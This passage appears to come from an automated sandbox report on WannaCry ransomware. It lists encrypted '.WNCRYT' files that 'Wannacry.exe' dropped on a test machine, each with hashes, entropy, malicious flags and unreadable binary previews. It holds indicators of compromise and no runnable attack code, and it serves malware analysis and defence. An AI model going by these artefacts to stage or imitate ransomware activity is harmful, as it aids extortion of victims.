SSDEEP:	12288:ofmVLw6dV2mh9cu5rOybapzgV5OjmxZfSPR086gneg00Ym+l7fOg8us2tse8Hk:of68odlbYY7xZ6p08eoYXDH83i
MD5:	F2FFCE586A3CFF0AD4903E5C0C3D4B4B
SHA1:	77C7F76DAD6DF0FB972370BCBA4BA347A3D75F71
SHA-256:	1C2D08D295CD94E9DB47B1D08818642117000599539A1AFA68AA1B51756DA8CF
SHA-512:	C460BE10BAE0640A9D0C1727316FFC4D077481FFD8EAFD8EA7EB8C6D4EBF32D1C1D8CF505A16CB56507C63991A71E4B63BAC9C9505CAEADE9C9FED53B3F65723
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......~\{..`=..n.........MP6.AOF.`@......4u?.uZ....o..4..&V5..8.TV.C.....]..aGI-2.R. ._.)..... ..".V..Yv.....Q(...pAM.F..X......#..:.. gY..../~.>..[E\|.+Ri)A#..9..T.6..h.5.J).jfJ.V[..+T.....J.\bF2.T\..8.U,..I).NRbT......{9/.Y.e.Y.<.......O+..B .....................1....y. .uF.B7..-..1.#...^x.Vi.3.c.?7..........H........."Y..2G..}..$`........p....9...r.Mif0..cc....'....hW[d.o..I.:.z..S... \7~...$~.I.&..a..2\|..=.q.ed7.D....?....w...+...../..4\H4..\Zk.......8...rF..)B,z..!.,..~.....R..O4......t.........j.k..\.nt+.:../.N-..nn..M..BK mu.z. s0.......~S...1us......8A...`........9.n_J.v....D.e.2w......k.....AF....;.y.....R!......../..dU .jfX5.@./.z._g..9.."..P.[.....}..A...!.....h....h..y9.J..3s..^7.\..kfo..M!@...O..oJ.KuMP....,1R0..9u..0..].Z.@......D..H.......7p@3.@.lNa?..:.a'.8mCXA........Ua{. ]..............h.B./....j...:...'.d b..D..).p...f..2.%..-...W.P}c...e....G......>U...eT..w...:J.dp..R..EO+5'.......!U.?(.[.....9. .E...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\Flighting\FlightingLogging.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1816
Entropy (8bit):	7.891205575733303
Encrypted:	false
SSDEEP:	48:bkH1WD/Qjs2s/kKyiWoudxhni0LnGFxYudIk97Ku9o:oH1I/L2sMK5mTL62jk97o
MD5:	ADB41EA8279C27EB76BA4A113DC41DB2
SHA1:	A6B5D161F4EE5B655BEE8C508EDCA9866E73BC17
SHA-256:	27F8741E3BB55A9AE1EFDD2E3E71506AF8D12CC85F7064C68DCDFBB1C29C39F5
SHA-512:	5CA8EA7556A0978C0CA3807447B6BE58B36A1ECD1594CA2F5D46D0393014509C4E703FDBFA84947D5C2C39F4BF60B21FAB953483FCE1C527F0344F606DCDE1DD
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....$a..Z...u.KJ.A......#.ta.......t...9....'gzt.Fu1...................e....?r[..IR...R.M.k.q.....)...=.A.9.4.....l.'....n_.R.........w.W.".?Q....:..K..H.....W.=.....@...Z..`.x..m.C.&_.9.........G....%....Ja.......A.A...dH[...K...Kh#1."..M.R.-..d............X#.w.!V.c.z..V:rZ..wE.m...w~m!.\.I......PK.Pz....:.L..z..7..v.i).......{.1\..D....^/ 9s. ......t.{g\|f...Rsp_.(.J...uq..9V..H...p.d{.~.$3.U...7..z...-{1x..Ff.T.Y..rO.A..b....~.......0..9.uVZ2.]...Bf;.0..{..c........6.i.~.A.4..0(C........C..B.C.t/.....@.:. ..=..R,2..xSM./.qv^...L.....w....u.!N..~.>....R......5j~....8...N:...s..!...O./{........J..t_...*.C.......>.b..k.!(.$.............0...H&..rzh\.u..D.....tC.{gW3L...[....>.?...].6...d.S.-A.&.N....Ke....+....#2..O.y....."...h}..y.H.S..a...z...6.5z.k8-:!YfDj.d.n...7..t.j].i.....y.[.....'"..L.t....k.gO......M.:...\|\..T.g.~............ $.h..~....7.I0'{..b.M.&.M .a..J8.-Q....D1..)Pu..%...>........\|hg...q3.]$.o%.../..f..^.i.....^

C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\LogFile_August_18_2021__5_27_51.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	568
Entropy (8bit):	7.567566708461762
Encrypted:	false
SSDEEP:	12:bkE69ByFeWzRjTPgUymiiM5JLbndSaHb14fUbR/oKKBkabpW:bk5X0RHggQZpbP/ohb4
MD5:	6944888573B090679A5C6DA4A027D197
SHA1:	68A08FEC62BE53B3AB78123F2B7D986735F2593A
SHA-256:	3E0AFE23030736713EB019D399B8C4006A04F885EFD25CB49414D0E1AA1885CA
SHA-512:	47294FF839EBB70500DF8A25EEB3DF520238D4479215616E0AE6CC585FE01992CF044835C405CE534D2CFEC92E7EC9CB012A1D3A6CDCFFF7302E45F3CD7ED24B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.............h...c@....W+ C^.H.1Rb....A.6.u.RU."......_>5".....sH.........u...W%.g..;.E..........,a....Z..?...%g.....B...V.^......N....G.eh....1.....`....o.....[.U..YP!~..%..... .X..0s.Q..M..p...O[...p.3Y...:.WY.Y....GK...~.....I..b..x.&..Z=.`.............G.....I0.......Z.k&.c.M..\|..%. .R...../M@....s.....5..J_P.4L...D...h......9...;.qfw...H".M.ZW}..]f....#......K..M....E.........Q..S3l@.............M.T.W.u{...~.~V..+.....z.p9.w..5.<..&..9........^.q.It..t l.E.wk`w....Q.g.@..T.4G.{.....:x..e..j..%..5uL..B....W....]...f..0>.

C:\Users\user\AppData\Local\Temp\0.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.830809064732855
Encrypted:	false
SSDEEP:	24:piyO6TiSoJgYlela6gGcwJ9+KRLVXskA5JCgz+5:pF2SoJZelawBz+KvRkfi5
MD5:	5106E57F92E0E425BE1B0223F0156403
SHA1:	66DA8344CFB0409D9E183147ED85A7D59426F686
SHA-256:	14365D34A09ECB8B161FD464A5C58EAF2CCB6F87CE08D565379B6FB870D39DEA
SHA-512:	9905590F155CE5A3F4B37E58B15682608E0687F7ED858F8B79487819B509AF166232F9D4C20C00E3BEDB0CFBD4E35DCC2CB23D2DFCC4E2AAEB904D41085B4EDC
Malicious:	false
Reputation:	unknown
Preview:	.1.7..)L:...u..A,}F...)gHZ..I..+.....!...m-E.Itkc....Oc...v8..b.?...a.8......s....\|<G....E...(.<Z5..0wh.<l..q9'/C.....#.......E..%[>_d..$.... .n....a....>..e..-...{.s&.1.......'.h...'^.<.]\|..j..9(.6...MQ..B.o.V..w.U.....M...P..........y.X..T....r..Q.qw2...O..>..+.7.<.A...=..:..Agw.c/..%......a-....Pz.P.$6z..<2...O..h...n).;x..,4x..{..l#.@..U6....{.Bx^.j.L......+..1Y..\2.[.....!u:.t..z=...@dK....P..r._....\!.l....{...mU..,9......M...n.C.......y._..i.E.BCF.pKO.9...w..KroB.6....U`.u....5.$w................Y.S........_.N.71............!.y.q2.".k.6....uP....P....,.\..g..(.&..&.3s.5kuA6.\F..o........8e..CJ.,R4.X2S[....cP7....._n...M..UvE7....K.:9........De.......H ."......$.M.I;_....Af0-.....CW:./,wB..j...\..=x...d.3x.{1..o.........<...Q...pfz..q........E.+....w.U.e....\|.F.....:...b%B....-..9...:NS~...'.....=Wa,.e...).P..2P.p.d..Q.........;.T...K.8s.UK9-...Qt............'~.fG.7.8J..*.z7......j..Wi... ...!:.g......x._.....H

C:\Users\user\AppData\Local\Temp\1.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.795929969771428
Encrypted:	false
SSDEEP:	24:PgJm1ZCUQX/heW1YVuHfIKCRY47j0VrJwG1iBw4WMUrQeu0AWT3:PgJmpQvhdJgX7jIN1iBwDMUr/uAz
MD5:	5E86FB584F911E2F959FD8B529E86EB7
SHA1:	515550DCC5BADD005319762438422EA8010DAFAB
SHA-256:	76CAA4C856995F41921344175AE5157FFADF2E65AF984C72EAD016B140528093
SHA-512:	BF6F05A9CCCC5E7D5790850F4B4E780ED03E888EA23D6338CA03AC3C8EA77E244DA1BAC215A16F1D68E98EA71CE18DFC1F812C9021B9C2D0970FFAE82CB219E7
Malicious:	false
Reputation:	unknown
Preview:	..%.V0....O..6.;4...2[v..\|.>..f.....b.b....}....n......J...&CCq..#Z..\|...M..d..{.J.%f`...6.."..".;.i..[...N...v.3.......\|....../..'......Q..).....Jq^...c.....].../.E.........@.;&...G...Z...z......<...]...u.....e...w.q....."..J.._s2.S}.U.K5F...H.....h4.Kr..-(..D......4......e.AB\t.D.....9.o......../.J..5..kb{u].&%[.O.i.......:.....r.\..;;..;............D/..\fDA/.GXQ..6-.PK....=.l..e....'..J.,}!8..7..7..,..o.h9..Z.&....0.wD.....hzr....x.H..;....T+@a.D&.]fep.B......R.S.&.R....Q.p.+6R.....q.UU...\|.z...^.Ok.L.Nq.r....9.o'.'Vi.:.Zt..N.......U.....z.(...=..T....P..pc........7.....1.8H....CLEzII..z.{..CjQj.z?...c.2...]>...5o.:...?.6...c.<:D........ok\.I}.....g.j.....y5w.4..I..g$.C.%.u...{.;n...%...B.b./<k..D...9.9...%......zuc.7f.4.....Q.j.q&.@.F....[F..w.;...3.ny.J..;U.L.=>g.gtC.....x..sl..s.....Z.......]..{.~.}..........P...K.BX."w..aiL..N.)......I.).4....a...+.Irq...o...g.L.....C.............2.c[Ri.n.....1O-..4....1...{$q0..}1.\|3...3H.<Q..H.5

C:\Users\user\AppData\Local\Temp\10.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.805792872916508
Encrypted:	false
SSDEEP:	24:K2aD7A545Rf4Egw/aGnVoerTnlI4KY6a8Jzw6Bw0QAUTr351x:K2a3KY4ZkDVznluzwGQH/3x
MD5:	2E0CDF17F3B806ADE61111C7E8FF8511
SHA1:	13D0B164C7B60411B79C336A3CCE1D8D2271297A
SHA-256:	C47BDDF38EF6172D38E54781BDF5A102DF1A3CD7F0A6343AF70C5AD27BD6681D
SHA-512:	D537F6A1546619ECAE4D97C6854552DDBF2CFFAC9F80566250403FE5917B4C57825CCBEBCCEFC79F632E7E0876AD7E3C259CE4114D4FEE5ED181401A5165D556
Malicious:	false
Reputation:	unknown
Preview:	..B...r9..H.Du2......kX...o.?=.IB..&........#8....A..=.-.j...v....{...p`f..l...`.....L/bB..`>.m.d.+q.z....&.,K..M..\|A~.[2s].^..O\A....f...?.-....87.a......i.Y...........>..f.5DK.'...#....D.8.....a.........,W..}\....21A........T..@.l.(....?.../.w...Lwxm.t.'.k-.s...M....S.1..j.W.=.c."..,...D..E. .........;BU._m.<.....".......#..7%C......?v.E.."..t..1.@+.d..=r.R.....X.}2=.U.._...m.....R.FS.%...9w....F..b.\|..=SY.......R..5...-.U#^...U.N8./.#....~9...eo_YwG7.......s+....I.B,.......d..\|.....ga.t.s.....7W]6..Zi_.........9L<]R6..p.G....../.......}(. .y.A.={..(x`K......Dq.2(...K..e>RtK{.W.J...t ....#.kQ..[.$..Ii.>..O.....{,.^9._{JMKG.m.<...+...}...+.lNJZ.M..{2E....Fk-.m1%e.o.0.,O;.>a..HC:.K......H..p...s..u..b.$..!.....d...<.V..... .!yjj..tbT....A..F=.o..@T[.g....@.1...O$..m..<ozz...te.ttNq...+2.Ab..}.p+....~.y...P.J....u.-...y.pq.?....?..dn.N......(:........_.}:.A.z....'v`.^=.0ymD...":....+..[...`]0Q.8t..K>.../.6.2..0?........K..%o.j.!.A;>s.u.

C:\Users\user\AppData\Local\Temp\11.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.819991042178172
Encrypted:	false
SSDEEP:	24:p7/Mrx2xuAOdjYOPja/2QYOAj6usN9TLhL+iTfpv+4Ie0ev5Q/LdP:N/Ml2zO/ra/2QY32wiTfpmHev5C
MD5:	86283ED4017C5C03EA556060B7353A5E
SHA1:	6D5B434943EC8291EF33E3FC6BCDBAEB4C729980
SHA-256:	577C4183F24E76A62AFC0A47FEE77B3106C73A0ED83C0B83B23C9DCBED4818D1
SHA-512:	8130AA091C08D339E37E69503C4BCD2E847F52427B34F4C202773B42A831DCD97801FA7BE951F7E3FE467C8DDAFA74AAD7246DCAE9B9AB84BC85F40A816C3567
Malicious:	false
Reputation:	unknown
Preview:	.........9..Z.vd..e..o..KP.S.4..O.f....EgR(.rM.}..a'..#..L..x!~..Z.[..Ce3....U.7o......]....;.^U..j.l08r....G..;[....J.......,q.y...#..h.N....Q.........._.....+.p.;.K.....>.u.Eh._....R,s....Q......Z/H....7h.k...\...%X...".>...jS.(.2:m...N...B....L.oK...i.f.N....J....(...x..;.. \|0S.K..j.lbUI...S..5.1...@.{3..f.0Z...lE.G.oo&.b.E"Sj)].XI.K......q-....4=.......H.(..9.ZW..i..([..rt..T.....l.VI.a.^\|O.......t....D....}... kF...$f...Z..C....+=.kN.......e.....!]5 ..4y[.Nl...}?...t.3.x..uQ..(.o.I...d..P....7..y/x?.>J8.W..h..#.t&.j...3mk`....\..k.V..kS#....I.Z].q.....y......../....?.C.......`..p...[.W.HS..........CU!.....C.c2.+...G..+I^K.6}Z\|..2t.....h....y.X,..xA@.Y....Bd..N..y(.2...K..y<..V.U..%...z....a..........Z'../7..;8.x6..q.....A_w7a..m\3..n.,28...q.G.@..~EL$.....1P.,..s..>2A.!.e....D.&.."v....Y"$......W...M......u..f)..b...C.EA....DHg..lq.(./...f.E.'.c.X..i[.E.......IL...#.<(vK..#Ne..<.d\|..6.hC.V....9.h.q...n'.#ey.nb..v..[.....3......C

C:\Users\user\AppData\Local\Temp\12.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.81212931271317
Encrypted:	false
SSDEEP:	24:B0E3yaNWlsP5YtgezqCIo8IRrQG5YZc3T89MtQTivzNXXs:B0XaN68deBN+Qq8AlGG
MD5:	0246F84A94C5AA4CE0745089D32006E6
SHA1:	75933558C79EF4946B4F92A3DA184864146A394D
SHA-256:	B99AA28A4935D4D9A131141DD03FAC54F37DD5C34FA6E4381BF00E36B71D1C9C
SHA-512:	06B02EFA60DD6797D1A088E5028C41234F1832F6BEB11E762CBCDFD94051D2572CD7FD283623966681A3D4756367B06BECC633DE7C6CC80D1931AD9C550C201A
Malicious:	false
Reputation:	unknown
Preview:	.I!.aa...b.oe./..m..mxKl.... ..M'Zv..D.g..'7^..n.V.Q@-....Q.ysah,.it7..Ol.R>.7..^.....;....4.l....O.X.\|.9..^.....F./....+.z..o....`...@....9...8y.2.NF{<F..'-..<.i...>8...'}...1...5........914$.T._Vk.L.......E....S~5C......g.4jH......$W4~....>C...(....eQ.3.s.Y."...hU......."..A6.&,.^.Ve.L.;`..5T.`.-..0zt..\p.w~..Q..Q.).5.HI......EPn.D.$...X.Q$..:.`..D..=. .6..4.OU..dpZ.......5..h..ERO.G1&q.j.;.`..K.e......h..&....P.=...v,..F...r...S~..t..Z.##vL....7...~..'....\|\|..T._a."'.n..>....W..=c6rH.p..x...q2.$...E.N#....W......1+=.....Gei....P....b....7.:.i..&.@....I~..O.9.?d.F....D.s`.l.9W..A.O....#..........$...<.".:z..,......4.C.H.=EmQ..A......m.=.F?..d.3_..a..h.Xb.J.e..+Q.F[...3S....74.@...{..&...m....G..v.a4..G.t.,.%e.w.4...ZS..w.bN.;..Ln.E....(4........od.U#p1.RK.c..L'.T]oQ..L\.n.....A=..r...Ye7..k.....;1er......p<.....4......7h+$....rU.P..-.\u....zPR..P<.,...../...ysJ*.....R.]w..a.{..m<.......F.Bis.c...oq...%H.L}.q&9W..bh...<P.}.&..R.j.2^....{0qn...,.....

C:\Users\user\AppData\Local\Temp\13.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.820772286672497
Encrypted:	false
SSDEEP:	24:yk9zFJlZI65elQiaxFnjym9uTjS0ZTdqrc+iWWyYrX:NzhZI6MWiaxlATG0ZdqbiX
MD5:	FFAE68E120FE0A72CA97B8A02BD0CB8A
SHA1:	EA4B84C3E06CFE8D8DA97FAE9015A79E6A952437
SHA-256:	0C83A31C0E072425936B590818B55E80148CDC0AD2BACE74B82AEFBBA0B94FB2
SHA-512:	085297D2AB208EAA7C1BDAADBF4A64DC15D1EE8F332FF2D34799226D0B6CA96A42794B76168E19A63CF6C76542C2AEFDC8375AFCC0172C3A0E23B0271D542886
Malicious:	false
Reputation:	unknown
Preview:	Y.1.9.&...Z..\....V...4..N{....p.)...gv..i...C.....)..........W.I'.....e@.`...E.m........9n.....vDJ_..4..6.q.....i.Q.....0-....Fom..q.....G...2...K..>..:vd_.N<)..\|....L.y...p....Z.^..M..&..#.^V.q...xb.....f.!....D.....o;\$..).....R..u....Hj..9..w.w..$....X..c..6.P....?...Z.......s...u..&.C.........7..f.i..g....t...@....p.s7...[..4~..9...A9.PRG..:..I.3.......D.).5.G..w...'..:.`.Q-..6..Q.8afA.G...x.`Q07.xF.u.s....0.OhY.....]>...:+%#J.J.9..H.n/...:..Z..^...iJ.K.sC.n.:...x`..+.@..!......_....W..j...m.\|.xuL..w....e._..(#..u.#..@...c./.....2...v....cf...yT.JV.A...4.5.VV.F2.._G....!.,.U..H~V..?...'..%..."B.I../.......9x.4..Ar...}.$......(..Wyl..E..$)....o.\..X..;.k{.y.E.]..CP&\.nc ..@....pQ.IJ....:6..e4....j..R......rU.>.X..Z......bQ....i.h.I.}Q..ei.;.~.z..J0l.S.wu(.,.Q..62Z....o...NZ..j...>.D.N.Y\.....a..}.\..O..O.V0.C.jZ.....Q?.#......uX8.&..jZb./........k......Z.G+.....)...Z....u.+...4.....zp^9/...#.b....`..}.M..{..U..........8..

C:\Users\user\AppData\Local\Temp\14.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.837451735594573
Encrypted:	false
SSDEEP:	24:BLbud6mfHFn5vfWrGUC4W8Z2tfPZe59xQbqqVMVnlGJGS0XRWScPxo:1ud6mflnJ0PC28FPZezxQbqqV2cScm
MD5:	F43A31BC67A67B0FFC8274DF7A736BD1
SHA1:	781DA967ACA5AC9085B9D35EDDEDEB9498C055BC
SHA-256:	2FCD5CC3D042B343495A2AB6178804CBB790465BACFED48CD3C5083D2C9F214B
SHA-512:	5BCAAA4D5767CB21FD9447D240214CAB95653A1D10859626BF5C4DDEC4FA4E0EF2415D38F175A132ACBB699D00EAF7530954B2AAC839382A4C91AB1D4CDC39B7
Malicious:	false
Reputation:	unknown
Preview:	...jK.5..Z{..W.}... R.....Rvj@b,.te.....r@...Q...R.P..........8D.G#.a...K......6..N..W........C....Lo@..k...I..'.T..W1P.m......Qu....[..O.>.d._-.\|o.....-..\|....C..%b;.E7i.,.l<....^.".%_.M}.e.LFy .R.1.k=..8....A?W).kqE..z..z.lC5^7(o..v&i.p.C....k.!l..Q.=.^]...2;.A~...Y...:<Q......u...ai..#\|..(.o..Q..a +.R;.;]W....?..F}...H..f.n....\.LtV."... P..k..q...M.......#...G......PkH.. .=....G./C'.z)...2.w....M.C......Xu.$V!....`.G.T."0....GiOr..+n..:E....#...X.M6..&N....].+..](&...{.%..5.1..R..c.g(.4..(.RX...O..c`[\|/.7..w..w.C.>.E..9..S.2.....w..)0G\|'h9.9..v@...<..:.....E...4.m..G..O..R.~o...w..A...j...V_...S..8!..,.....E.s...b....N...F..8..s..{...vO...!!pM.j.Y...4X..-.D..?..T..b...r.i.#..qpHT..5.......$............0.#w}D...o.,j A.x..g2.n.YuQ...ap.....Z....i...8...uJ'..V...Hu..... .$h....t..J.....:.<........L......'..N;6..3.:....'.Y.(..?.%...%0......:U..0pF..emX.e."P2&.<dx...&m..n.}..9....o.?.....^.Y..6c.\w9M..=........d.t....T....J..;4.>..i

C:\Users\user\AppData\Local\Temp\15.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.801985468700334
Encrypted:	false
SSDEEP:	24:0KmZupmnYjWn8MHttP7Uy8yz5oGqPHUhB2L4Dws:0KmSmYjQvHnz8yVse2LVs
MD5:	2602BFEF83508B0DAB03374BF360C4AE
SHA1:	BFF917BEB2F4F0E9973A3F37922F12245AD5A07E
SHA-256:	2A59EE47E94A9684EDC25A1F8CC2216EBA8D455D653A121665694553B0559CB4
SHA-512:	368C1230B1C03CBFFA0F4497B4D74B6025E865C0ADE9A93D6452D9AA9AEC7342B22BE3904E6646FA4D417F3C0A0AA2CDB73CB3122445E19E495481CD88BCDEC0
Malicious:	true
Reputation:	unknown
Preview:	..E/d.!........>....U5-...../F."...5.. W..-.....L...E6.$...h......"....W.E.rC......2.`......5.VB....o..cEy........H.`cH..Y....)..6..:..d...8..@..i`Z.W..Ro...N...ai...k..9O..O.}tB.(:..~..'.y6.i.......j..{%SF...{.L]W...z.....U....-....S.......mgu;...'F....f.m.'.Rh5..}..........z.f%.jv...M.....t_.6...o...A....=..:4..,_P....Z...s&.<.\.....t?~go...........f....t.]......xE !6S..9.......-.Q...2a..o..y...O..C..._!.........B...!....gz..6.......&I.[..G.w#.vt..l....9..Y.,.&.......:...../...+}@{.....:.Z..-..g...(.....s@..}.y4q..JmR. ....X.p.#z.\|N..I+....$.;.3J..dU..r"-.....Qd.J.........%F.F...C:M.....)...(Dl..m..l..SNm0..R.....OX.H..8..mH.......8t.tV..5..o...A.....F..........`Qyx....5....8d.s#g.{.......y.....W$..0..4........0..zb0..s...wM......U.9.)...H...?{6I.XLPKF...7_......s.........9..mwt.+.x.?k....A.ls...Y....\|.&..=x...2Z.wBId..."_..#.... .Yd....ZU.....^P..rcYC[.'...u*......X...=.....oC=Eo.F.H.j9;H.......J.........,bA..q..Q0...ym....?....{1(

C:\Users\user\AppData\Local\Temp\16.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.840545290778321
Encrypted:	false
SSDEEP:	12:WLCxQU+FcI8LM4NJQTyhJwJgrSVcTyLasppXzUasYWq4KDhFPuhhJYo+CMiSLrPf:W9U+wvJQfpDUMWqHAhJYkSv4uavS7q8
MD5:	110C040373ED52F7F46CF3C02988D9E4
SHA1:	CD499FDBD64C34E7C182A52B01D677E09419CA83
SHA-256:	6052390076FFF6F3B5E05D328A2A3ECDAD1977D557961E33F9BC3140A3826AB8
SHA-512:	C3982E5E13A9A0DD1A2990EA2AEA44747CC51E3B11930171200D6220C1AC18FA0503EE844A57C24E68982A1243EE609D441F0094CA9B2945D60BB32F43DB8168
Malicious:	false
Reputation:	unknown
Preview:	.[Ino..p.p......HL..5......A..>!z.a........nt.......D,.r8.~...+.......h;Tx..j{..W..I..F.LZ..N..y8I...S.../...l...fw.\|xN..=1..4..X.W~V.....p........N...KYi... ....Xc.......#\.......5.....0../\..-..6...dm.`....;....R..CB....hi...C?..=C......X.._..M.H.0;.4T.`.0.(4.u:...V..`....H.X...&^9..G....-.-:../l...;..iPY..5..>..6%j...v}..0h:....f..{Je@.].b....u.hv.oL...._......5....D.......;.\|g.C...{~.....n.b4.....L..^V..Ei..WG^<U..V....3.......oQ..'..B?..+.\.8HFoKD].E..PA..eK..-..se.O.9...:.e..&2.i...Hh...Kj..!.c,qv.L.u....[^..EM.... Qs.{....Q5z52H.w..sI ...%\.%t..I....(....f...?..#./[.k.}r......r%..>..>~Z.>FX..UC.>r.8....'.:#..Pm.....".....OG..z..f.yvYFO.m..3~u[....9...N/.w..+<k8.$..E\|..9....I\..\k.Y.$.....&...j......".}..5........SM<..x".}..dF.l+...S..g...F{..@..F._.N.. ...hh}.:...z.u...\|k..tu.....7..y.0J./...)......zU....?.?..-}q..IA......%).2r..Kl..S...e\|C~...0....V...RX....,N.S@vs..1...~.>...*...%.j....a....6..t.t..V.[M[....P-.....0Vx.&u-../....

C:\Users\user\AppData\Local\Temp\17.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.778033759865869
Encrypted:	false
SSDEEP:	24:hEDgTdSBdoml0amZ33QAWrVM7Mwurx5Jvrtw8/4i1yb0r:hE0SB282Z33Q/GZur7hT3k4r
MD5:	1B52119CB562E32CC9F550860E9B2348
SHA1:	7DF505714BA34A1B4C29F417CCC104DEC5E053B3
SHA-256:	B2677E3400EBEF1C5239287478C144D8B2885D26FED9DCCEC87491964611F51F
SHA-512:	BB287F927FE0FADEEC062A414C88162C8B16ABA461C34C4BDDC26AE8FA981B17C641D01B864481FDA03A3CAC59814D6A59E46E44E2DA46459D5AF3D565748075
Malicious:	false
Reputation:	unknown
Preview:	.tG.}..Q.v....&...^F..k.r.....h....k.&,v...B$....wUV.....l..Q...l..sC..@......P .`6,U1YF..n.@..H.G..0..-..+.,Q.h....$..M..............#m..;....A.P&.8.Lz.cg..d...8...c,.{oi...7Y......'`......L....S..;7Kl....Q.L.t...jk...HK....=.8......]L...2........@....yV..K.>.!a.@H)...P.EE...+x...7.C.m..........uG.:Y.)Z..T.......W.$.XNW.e.l.......=.2#.../.......>.).P\|s,......TBx..%.8..t.r;.^.&.68.2..{..S4.j"&..+....T.;.....u..XXv...s..jrvc.:.>v......}...H..eb.fmEw...:QZ.....&..>.......6..e.S..6]...=.........\|W.5Y.0.X......^i,..S..a~_.=..b.C....?....e.....>...@.....T ...ic.&Aw..DL...lr.(G.....c..@>..)....=...t/R...7......Lg>#...s.t........ri.B\.........3..m.4...F..^...T&..v..7../)....[.iN@.Gl.0#.>.....=A@C..vB.t(#Y]a5f..h..?}j.....Y1.bntDn...y.e....?^..A.A^,.I....~...J....#ReZ.o.._...D.NbF...AzF...=bC. ...'.\T..f.c..y..~u.F.e.....2x.S?....?.#\h._../.9.F.5\|..n`.N[.5.#?..Z.qH...8N*7..r H.u9R.mskT...._.je.....GU&onC1.X.P.w.....Y.....f...@z.r#..........3.v....H..

C:\Users\user\AppData\Local\Temp\18.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.805221957445608
Encrypted:	false
SSDEEP:	24:lURGYGuKYpAXT8tApbFNk9z6NFcI0icpI9QZlhFHhe:1+eXTHPk9IcIRcyElk
MD5:	3B9A44CC2C3855530AC3A8C92396B5B6
SHA1:	FC5740F8BDB38CFEA5B88888EE5EBBDCB5EA8A84
SHA-256:	625924161F4678A65740525F66B17E7B06D864F22F7802DAC3F0FFA99329C8D6
SHA-512:	DDF50623EA8BE2F2F0C1C6CD7CC6397B1D25CD0864045ADCC5661707AE4334C83F084A55E3F41D93DC72A31B17FC2810DA7D3576473042F0F4CF6A4C1D131533
Malicious:	false
Reputation:	unknown
Preview:	a.n.J`....y...`.N.+.Qk.H.R....4....1.(v...~F..b...G .=.....V0.}#..M!)....&[W.A<....fxt7....v.......eJ.<6.m.c8o.<..d3}'.k.....~..?...m8..\.P.y.S.._Y.q..A.S?....=.].)........T...F...G.;~..f)2.R...`.IA...{.o.d1g{..}~....n[.....u`i.MC4..wD^fs._........R...$..U...J...{nwO....!.X.....&...H....a..).]cx.c..g.ff[.?..9j...C..."......i....n..%b~..]LIV..Q..A..E...+...w..f.Ci.G!Jj....I.....wP.@..g..9....}.rb.L.E......+I.H....+......r.3..&`...Sr.K....R..9.$")1[....u.^..Y.m....s...N..[(sL..Ui..;4.......g.+.5.....1F9..).......j...;`8Q<#.(.!.....'=lLP...-#x.U...@....Vw. fp.0.................g3.c^.%...".lz...g.%}.U).M......l]+V.M...)Q..y.,=...W....e..e..p^HXT....Ju...<......?&}5.h...}...(.k..$y.8.v-..).*.z.;..xb..G.D.h .Zv...G;..\.~.vF.5.l.G..S-&.>...dD...l..3...x2...P.y......,.,I..\|W../.%%!.fy.5D%e.[....p.....Z.....x....l.E....Fe...J.3'J.&^....{.e...VU....:...%..J..:j;f....(9..qJ5.$.......&K+.../.1..u?#...e)C....3.$~lp..!..`.\+..o..}9...

C:\Users\user\AppData\Local\Temp\19.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.809923749401516
Encrypted:	false
SSDEEP:	24:7B5eHC52/xn2iQoT5apNR/X25YC3m5qmoq35Dj0DPy:7feHCZc6a1m5qmoqN1
MD5:	4038B5BB91D38AD2C88FF59EAE96D387
SHA1:	1C2A7B255B17D24EF189C50E22F3211253D72B72
SHA-256:	09475F14DE6937D4BFC2A5EF4848B39DF6B3F841768972D64821DDA69BFC4C0D
SHA-512:	25FFD1DFC7935196213E3D7853893954B790CD2D762BC88B1098F45297D6B0C4BB2EC08759A604E0F47413E078D148B16E970D58C18FAD779CEEC7665748C892
Malicious:	false
Reputation:	unknown
